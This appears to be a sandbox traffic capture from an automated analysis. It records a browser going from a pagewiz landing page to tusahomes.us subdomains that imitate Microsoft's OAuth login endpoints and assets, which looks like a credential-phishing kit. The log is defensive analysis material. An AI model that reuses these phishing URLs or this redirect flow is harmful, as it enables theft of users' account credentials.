            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 09 Apr 2025 00:18:45 GMTContent-Length: 136Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 5e 66 17 f9 55 f1 83 f4 79 b6 9c 15 cb 8b 14 7f 37 ff 0f 4a d9 2f 8f 15 00 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"^fUy7J/
            Source: global trafficHTTP traffic detected: GET /Media/2025-04-08-18-41-23-280meltrdtlzycycrwsmkhokxzmr_UserMedia.png HTTP/1.1Host: m1.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/fancybox/source/jquery.fancybox.css?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/style2/sweet-alert.css?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/style2/lpCommon.css?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/style2/bootstrap.min.css?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/lpFormValidations.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/fancybox/source/jquery.fancybox.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/jquery.tip.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/swfobject.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/jquery.json-2.2.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/bootstrap.min.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/sweet-alert.min.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/stats.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LPStaticResources/FontFix.js?v=18.01.24 HTTP/1.1Host: static.pagewizcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /Media/2025-04-08-18-41-23-280meltrdtlzycycrwsmkhokxzmr_UserMedia.png HTTP/1.1Host: m1.pagewizcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /counter.aspx?pageid=648467&isunique=1 HTTP/1.1Host: statdumper.pagewiz.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /PWPixel.aspx?guid=f24cc4c2-2ef1-79f4-1744157914689-6fd32dc72398&op=1&pid=648467&refer=&href=http%3A//p1.pagewiz.net/vericastharlandclarke/&hostname=p1.pagewiz.net&referrer=&appCodeName=Mozilla&appName=Netscape&appVersion=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&cookieEnabled=true&language=Mozilla&platform=Win32&userAgent=Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&screenWidth=1280&screenHeight=1024&uv=1 HTTP/1.1Host: stats.pagewiz.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /counter.aspx?pageid=648467&isunique=1 HTTP/1.1Host: statdumper.pagewiz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /PWPixel.aspx?guid=f24cc4c2-2ef1-79f4-1744157914689-6fd32dc72398&op=1&pid=648467&refer=&href=http%3A//p1.pagewiz.net/vericastharlandclarke/&hostname=p1.pagewiz.net&referrer=&appCodeName=Mozilla&appName=Netscape&appVersion=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&cookieEnabled=true&language=Mozilla&platform=Win32&userAgent=Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&screenWidth=1280&screenHeight=1024&uv=1 HTTP/1.1Host: stats.pagewiz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?vffzw9n=Y2Y4NGIwYjU5NTVmNDk0YzkxMmQ1OThhMjBmZGRjMzg%3D HTTP/1.1Host: vericast.tusahomes.usConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://p1.pagewiz.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?wZfUflpx=67f5bce71f9fd88e9ef40d75 HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://vericast.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: c547f1062152409fa58dda457a02be72.tusahomes.usConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://vericast.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0 HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://vericast.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1Host: 126d7c624ad3410bb741b30b9bf3d28f.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.usSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75Sec-WebSocket-Key: DBEe3gWLH2BMsf3N57Ue8Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=true HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
